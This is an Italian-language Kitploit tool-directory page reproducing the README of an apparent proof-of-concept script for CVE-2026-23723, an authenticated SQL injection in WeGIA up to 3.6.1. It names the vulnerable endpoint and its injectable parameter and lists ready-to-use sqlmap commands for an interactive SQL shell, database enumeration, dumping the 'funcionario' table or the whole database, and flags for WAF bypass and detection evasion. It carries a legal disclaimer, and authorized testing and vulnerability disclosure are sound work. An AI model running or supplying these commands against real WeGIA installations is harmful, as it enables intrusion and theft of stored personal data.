Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-23723-POC — Questo è uno script helper Python leggero progettato per automatizzare la generazione di file PoC compatibili con sqlmap per la vulnerabilità di SQL injection basata su errori autenticata in WeGIA (≤ 3.6.1), identificata come GHSA-xfmp-2hf9-gfjp. | Kitploit
Strumenti/GitHubGitHub/ch35h1r3c47/cve-2026-23723-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubch35h1r3c47/cve-2026-23723-poc

CVE-2026-23723-POC

Questo è uno script helper Python leggero progettato per automatizzare la generazione di file PoC compatibili con sqlmap per la vulnerabilità di SQL injection basata su errori autenticata in WeGIA (≤ 3.6.1), identificata come GHSA-xfmp-2hf9-gfjp.

Vedi Repository
316 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-23723 PoC - Helper per Exploit di SQL Injection Autenticata in WeGIA

SQL Injection Autenticata Basata su Errori in WeGIA ≤ 3.6.1
GHSA-xfmp-2hf9-gfjp | Avviso Ufficiale

Autore Originale del POC / Segnalatore: ViniCastro2001 GHSA Pubblicato da: nilsonLazarin (manutentore del progetto)

Questo script Python leggero automatizza:

  • Accesso al sistema WeGIA utilizzando le credenziali fornite
  • Estrazione di un cookie di sessione PHP valido
  • Generazione di un file di richiesta compatibile con sqlmap (punto di iniezione marcato come id_memorando=1*)
  • Output di comandi sqlmap pronti all'uso per enumerazione, shell interattiva e dump dei dati

Funzionalità

  • Prova più percorsi di login comuni e nomi di campi del modulo per una migliore compatibilità
  • Genera il file di richiesta sqlmap (.req)
  • Fornisce comandi sqlmap copia-incolla per:
    • Shell interattiva simile a MySQL (--sql-shell)
    • Enumerazione di database / tabelle
    • Dump mirato di tabelle o dump completo del database

Requisiti

  • Python 3.x
  • Libreria requests (la maggior parte degli ambienti di penetration testing la possiede già)
  • sqlmap installato e nel tuo PATH

Installazione

root@kitploit:~
git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC

Utilizzo

root@kitploit:~
# Consigliato: prompt interattivo per la password
python CVE-2026-23723.py --url http://target.com -u admin

# Fornire la password direttamente
python CVE-2026-23723.py --url http://target.com -u admin -p wegia

# File di output personalizzato
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req

Dopo l'esecuzione riuscita, lo script:

Tenterà il login Genererà wegia_sqlmap.req (o il tuo nome file personalizzato) Mostrerà i comandi sqlmap pronti all'uso

Esempio di comandi generati:

root@kitploit:~
# 1. Shell interattiva simile a MySQL (maggiormente consigliata)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb

# 2. Mostra il database corrente e tutti i database
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch

# 3. Elenca le tabelle nel database wegia
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch

# 4. Dump di una tabella specifica (esempio: funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch

# 5. Dump dell'intero database wegia (attenzione!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
Flag sqlmap opzionali:

--proxy=http://127.0.0.1:8080 (attraverso Burp/ZAP)
--tamper=space2comment,randomcase (bypass WAF di base)
--delay=1 (rallenta per evitare il rilevamento)

Se il Login Automatico Fallisce Accedi manualmente tramite browser → copia l'intero header Cookie → esegui sqlmap direttamente:

root@kitploit:~
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
  --cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
  --sql-shell --batch

Disclaimer Legale Questo PoC è fornito esclusivamente per scopi educativi e di penetration testing autorizzato. L'uso non autorizzato contro qualsiasi sistema è illegale e proibito. L'autore e i collaboratori non si assumono alcuna responsabilità per un uso improprio o per qualsiasi danno causato. Riferimenti

GHSA-xfmp-2hf9-gfjp CVE-2026-23723

Scarica lo strumento